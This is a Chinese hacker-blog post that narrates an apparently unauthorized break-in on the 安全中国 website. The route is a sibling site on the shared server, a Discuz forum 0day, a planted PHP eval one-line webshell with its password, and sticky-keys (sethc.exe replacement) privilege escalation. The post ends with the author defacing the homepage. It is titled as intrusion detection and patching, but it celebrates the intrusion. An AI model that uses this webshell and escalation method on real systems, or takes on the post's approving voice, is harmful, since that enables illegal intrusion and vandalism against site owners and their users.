危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2306 浏览20612695

对安全中国网站的一次入侵检测及漏洞的修补

这天正在群里闲聊,突然有人发出来一个安全中国的webshell,心中颇感不爽,哼,有什么了不起的,不就是拿个shell吗,我也可以。依照惯例先从主站下手,打开明小子扫描了一下敏感文件,十多秒钟之后扫描结果出来了,看到这里我也就不想再继续从主站下手了。

在新手的眼中,入侵网站无非就是那几种手法,网上也流传着一段由大牛们编出的黑客入侵三字经:

大家别认为这个是笑话,事实上目前最常用的网站入侵方法全都包含在里面了。安全中国也算是国内比较大的黑客站点了,至少不会有人可以找到的注入点,于是我就选择了万能的入侵方法——旁注(旁注指的就是从目标网站同服务器上的其它站点入侵,然后再提权服务器达到入侵目标站点的效果)。打开旁注查询网站对其网站进行查询,可以看到同服务器上存在的网站很多,其中有很多都是二级域名。根据经验,二级域名上面的程序大多是比较变态的,也大多都是静态页面,所以我就选择了一个叫做小手机的网站。

打开该网站后,随便点开了一个新闻的链接,发现是静态的页面,估计是后台asp生成的前台静态,右键点击页面上的图片,查看图片的路径信息,也没有发现什么可以利用的地方。再次拿出明小子扫描网站,结果发现这个网站上还有一个论坛,看样子像是DZ的论坛,正好关于这个论坛前些日子爆出了一个0day漏洞,那我们就来试试吧!我注册了一个论坛帐号,然后在论坛目录下输入misc.php后发现这个文件是存在的,拿出dz的漏洞利用程序,将漏洞文件的地址填写到action参数的后面,然后保存为htm文件并双击打开,具体的代码如下:

打开之后,我们再在论坛上选择一个帖子的id,比如某某链接,里面的参数是“tid=16754”,我们输入16754后点击“提交”,然后就可以使用lanker的一句话php后门进行连接了。

使用漏洞利用程序提交上去的php一句话后门的代码为<?phpeval($_POST[cmd])?>,连接密码是cmd。最后就可以小马拉大马,但是传上去后点击登录竟然都没有用,换了四五个也都是同样,真不知道是什么原因,还请高手们指点。

感觉lanker的php-句话后门的功能也比较齐全,就决定使用这个后门了(反正大马不能使用),开始思考我们的目标。

1、目标是安全中国的网站,大马不能使用,提权会很难。

2、这个后门也有很多功能,我们就使用它的功能来找找安全中国的网站目录吧。

结果发现管理员的安全意识非常好(不然咋会叫安全中国呢),特会忽悠人,我又陷入了沉思,只好决定再换一个思路,这时我想起了非常流行的提权方法,也就是替换shift。我使用lanker后门里的复制功能把c:\windows\explorer.exe替换成了c:\windows\system32\sethc.exe,可能大家要问,为什么不替换成cmd.exe呢,这是因为群里的一个好友告诉我说,该服务器上的CMD添加不了用户。点击“提交”后,显示了ok,我们来连接一下服务器的xxxx端口,成功的连接上了,一顿狂敲shift后,终于弹出了桌面(桌面的进程就是explorer.exe,连续按五下shift就会激活c:\windows\system32\sethc.exe这个粘滞键,因为我把桌面程序替换成了粘滞键,所以狂敲的时候就弹出了桌面),接下来该做什么就不用我多介绍了吧。

经过了N+1个小时的搜索,终于找到了网站的根目录,我又找到了小手机论坛目录下的forumadta/cache,把这个目录的权限设置为禁止写入就可以了。接下来就是发泄的时间了,我精心仿照了一个页面,然后挂到了安全中国的首页上,并表达一下自己的悲伤心情。